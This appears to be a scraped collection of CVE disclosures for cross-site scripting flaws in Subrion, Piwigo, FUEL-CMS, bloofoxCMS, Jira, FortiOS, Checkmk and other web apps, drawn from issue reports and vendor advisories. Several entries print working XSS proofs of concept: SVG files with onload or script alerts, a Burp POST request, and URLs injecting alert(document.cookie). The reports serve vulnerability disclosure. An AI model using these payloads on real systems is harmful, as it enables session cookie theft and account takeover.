Accounting Journal Management 1.0 is vulnerable to XSS-PHPSESSID-Hijacking. The parameter manage_user from User lists is vulnerable to XSS-Stored and PHPSESSID attacks. The malicious user can attack the system by using the already session which he has from inside and outside of the network.

**Accounting-Journal-Management****Vendor**

![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/raw/main/vendors/oretnom23/2022/Accounting-Journal-Management/Docs/Screenshot%202022-02-01%20164119.png)

**Description:**

The Accounting-Journal-Management 1.0 is vulnerable to XSS-PHPSESSID-Hijacking, the parameter `firstname` from manage\_user app is vulnerable to XSS-Stored and PHPSESSID attacks. The malicious user can attack the system by using the already session which he has from inside and outside of the network - external domains. He can send the already stolen cookie-session-id - PHPSESSID to other malicious users and then they can attack brutally this system, it depends on the scenarios.

Status: Medium

**Reproduce:**

href

**Proof and Exploit:**

href

CVE-2022-24582: CVE-nu11secur1ty/vendors/oretnom23/2022/Accounting-Journal-Management at main · nu11secur1ty/CVE-nu11secur1ty

A Cross Site Scripting (XSS) vulnerability exits in Subrion CMS through 4.2.1 in the Create Page functionality of the admin Account via a SGV file.

I have found Cross Site Scripting (XSS) bug in subrion CMS version 4.2.1 in the Create Page functionality of the admin Account.

Steps to Reproduce:

just login as admin and clink this url https://demos.subrion.org/?demo=core&admin=1  
As an admin Create test page  
In the Add a Page section go to the Page Content then clink “image” choose local file 123.svg to upload in url :https://demos.subrion.org/\_core/admin/elfinder/?mode=image&CKEditor=contents%5Ben%5D&CKEditorFuncNum=1&langCode=en#elf\_l1\_Lw

the content of 123.svg：

    <svg
    onload="alert('xss attach')"
     xmlns="http://www.w3.org/2000/svg">
    </svg>
    

![image](https://user-images.githubusercontent.com/57324002/140773739-c0e57310-0fbb-4c15-8997-6f539ee164d5.png)

copy the url of 123.svg then and a link to page content:  
![image](https://user-images.githubusercontent.com/57324002/141151201-4da4774c-dd64-4297-ad2d-a0ec1e2dc3a1.png)

save the new page and open new page:http://localhost/123.html

![image](https://user-images.githubusercontent.com/57324002/141151398-01538599-9461-409a-ab90-f936173601d1.png)

Xss prompt box will pop up  
![image](https://user-images.githubusercontent.com/57324002/141151473-b5782faa-a6cb-430b-a49d-35d98888c85c.png)

Impact: Session cookies can be stolen , user can be redirected to phishing pages , browser of the user visiting this page can be controlled etc.

POC's have been uploaded.  
![image](https://user-images.githubusercontent.com/57324002/140775407-6c18a98c-0752-4e28-809b-2fc6a1f08eff.png)

CVE-2021-43724: this is Cross Site Scripting (XSS) · Issue #890 · intelliants/subrion

Piwigo version 12.2.0 is vulnerable to stored cross-site scripting (XSS), which can lead to privilege escalation. In this way, admin can steal webmaster's cookies to get the webmaster's access.

Hi, I found Stored XSS in Piwigo version 12.2.0 (Not tested older versions).

**Proof Of Concept**:

1.  Add an admin through webmaster's access.
2.  Through the admin account open http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat\_list
3.  Add < svg onload=alert(1)> (Remove space) in the group name field.

Can use any malicious JS code, Now you can see XSS will pop-up.

**Impact:**

In this way admin can easily takeover webmaster's access using this technique.

**Burp:**

    POST http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9,hi;q=0.8
    Cache-Control: max-age=0
    Connection: keep-alive
    Content-Length: 98
    Content-Type: application/x-www-form-urlencoded
    Cookie: pwg_id=lq5gpi2eacbfhhp9ckm0i60ee0; pwg_album_manager_view=tile; pwg_user_manager_view=line; PHPSESSID=hjg1fi2funadnubkkvb7381ede
    Host: localhost
    Origin: http://localhost
    Referer: http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list
    sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
    
    pwg_token=4feeb12539296772205ca90e39d382aa&virtual_name=%3Csvg+onload%3Dalert%281%29%3E&submitAdd=
    

![Screenshot - 2_3_2022 , 12_42_32 AM](https://user-images.githubusercontent.com/18497191/152221531-dc8c660a-e2f6-45ec-bba5-2bfa6c8b1a65.png)

Please fix the vulnerability & let me know :).

Thank You!

*   Chirag Artani

CVE-2022-24620: Piwigo-12.2.0 Vulnerable For Stored XSS Which Is Leading To Privilege Escalation · Issue #1605 · Piwigo/Piwigo

A Cross Site Scripting (XSS) vulnerability exists in FUEL-CMS 1.5.1 in the Assets page via an SVG file.

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .svg file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
    http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
    "/>
    <script type="text/javascript">
    alert(document.domain);
    </script>
    </svg>

CVE-2021-44607: A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 · Issue #589 · daylightstudio/FUEL-CMS

Multiple Cross Site Scripting (XSS) vulnerabilities exists in bloofoxCMS 0.5.2.1 - 0.5.1 via the (1) file parameter and (2) type parameter in an edit action in index.php.

I found two Authenticated Cross-Site Scripting in 'file' parameter and 'type' parameter

**Cross-Site Scripting in the parameter 'file'**

    http://localhost/bloofoxcms/admin/index.php?mode=content&page=media&action=edit&file=info.svg%27%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&type=0
    

![image](https://user-images.githubusercontent.com/57324002/144261144-e5330153-f46b-4d80-ad14-3cd4037ab300.png)

**Cross-Site Scripting in the parameter 'type'**

    http://localhost/bloofoxcms/admin/index.php?mode=content&page=media&action=edit&file=info.svg&type=%27%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E
    
    

![image](https://user-images.githubusercontent.com/57324002/144261379-46a1134b-796e-467c-bd38-a3114a716aae.png)

**Impact**

The attacker can execute a HTML/JS Code the attacker can stealing cookies

CVE-2021-44608: 'Multiple' Cross-Site Scripting (XSS) (Authenticated) · Issue #12 · alexlang24/bloofoxCMS

Affected versions of Atlassian Jira Service Management Server and Data Center allow attackers with administrator privileges to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in the "Object Schema" field of /secure/admin/InsightDefaultCustomFieldConfig.jspa. The affected versions are before version 4.21.0.

Affected versions of Atlassian Jira Service Management Server and Data Center allow attackers with administrator privileges to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in the "Object Schema" field of /secure/admin/InsightDefaultCustomFieldConfig.jspa.

The affected versions are before version 4.21.0.

**Affected versions:**

*   version < 4.21.0

**Fixed versions:**

*   4.21.0

CVE-2021-43943: [JSDSERVER-10980] Stored XSS in "Object Schema" field of /secure/admin/InsightDefaultCustomFieldConfig.jspa - CVE-2021-43943

Failure to sanitize input in the SSL VPN web portal of FortiOS 5.2.10 through 5.2.15, 5.4.0 through 5.4.13, 5.6.0 through 5.6.14, 6.0.0 through 6.0.12, 6.2.0 through 6.2.7, 6.4.0 through 6.4.4; and FortiProxy 1.2.0 through 1.2.9, 2.0.0 through 2.0.1 may allow a remote unauthenticated attacker to perform a reflected Cross-site Scripting (XSS) attack by sending a request to the error page with malicious GET parameters.

**![](https://fortiguard.com/static/images/icons/psirt.svg?v=5444) PSIRT Advisories**

**FortiGate SSL VPN portal is vulnerable to an XSS**

**Summary**

Failure to sanitize input in the SSL VPN web portal may allow a remote unauthenticated attacker to perform a reflected Cross-site Scripting (XSS) attack by sending a request to the error page with malicious GET parameters.

**Affected Products**

FortiGate versions 5.6.x. FortiGate versions 6.0.12 and below. FortiGate versions 6.2.7 and below. FortiGate versions 6.4.5 and below.

**Solutions**

Please upgrade to FortiGate upcoming 6.0.13 or above.  
Please upgrade to FortiGate version 6.2.8 or above.  
Please upgrade to FortiGate version 6.4.6 or above.  
Please upgrade to FortiGate version 7.0.0 or above.

**Acknowledgement**

Fortinet is pleased to thank Damian Rusinek for reporting this issue under responsible disclosure.

CVE-2021-26092: Fortiguard

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.3.

Permalink

Browse files

Update UrlManager.php

*   Loading branch information

![@bobimicroweber](https://avatars.githubusercontent.com/u/50577633?s=40&v=4)

bobimicroweber committed

Feb 22, 2022

1 parent 0b6b1eb commit a5925f74d39775771d4c37c8d4c1acbb762fda0a

Showing with **2 additions** and **1 deletion**.

1.  +2 −1 src/MicroweberPackages/Helper/UrlManager.php

3 src/MicroweberPackages/Helper/UrlManager.php

Show comments View file

@@ -276,7 +276,8 @@ public function string($skip\_ajax = false)

  

// clear request params

$cleanParam = new HTMLClean();

$u1 = $cleanParam\->cleanArray($u1);

$u1 = $cleanParam\->clean($u1);

  

  

return $u1;

}

**0 comments on commit `a5925f7`**

Please sign in to comment.

CVE-2022-0719: Update UrlManager.php · microweber/microweber@a5925f7

Checkmk <=2.0.0p19 contains a Cross Site Scripting (XSS) vulnerability. While creating or editing a user attribute, the Help Text is subject to HTML injection, which can be triggered for editing a user.

Component

Setup

Title

Persistant XSS in Custom User Attributes

Date

Jan 27, 2022

Checkmk Editon

Checkmk Raw (CRE)

Checkmk Version

2.0.0p20

Level

Prominent Change

Class

Security Fix

Compatibility

Incompatible - Manual interaction might be required

This Werk fixes a Persistant Cross-Site-Scripting (XSS) vulnerability. (CWE-79)

While creating or editing a _user attribute_ the _Help Text_ is subject to HTML injection. Which can be triggerd editing a user.

To mitigate this vulnerability ensure that only trustwothy users have the _User management_ and _Manage custom attributes_ rights.

Checkmk 1.6 is not subject to this vulnerability, but all 2.0 versions including 2.0.0p19.

If you have custom HTML code in the _Help Text_ this will no longer be rendered as HTML, but will be escaped.

To detect if this vulnerability is/was used you can check etc/check\_mk/multisite.d/wato/custom\_attrs.mk for HTML code. Please be aware that an attacker could delete the code after a attack.

CVE is requested and will be added later.

CVSS: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:N (5.2 medium)

We thank Manuel Sommer for finding this vulnerability and bringing this to our attention.

To the list of all Werks

CVE-2022-24564: Persistant XSS in Custom User Attributes

Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability discovered in Survey Maker WordPress plugin (versions <= 2.0.6).

Tag

#xss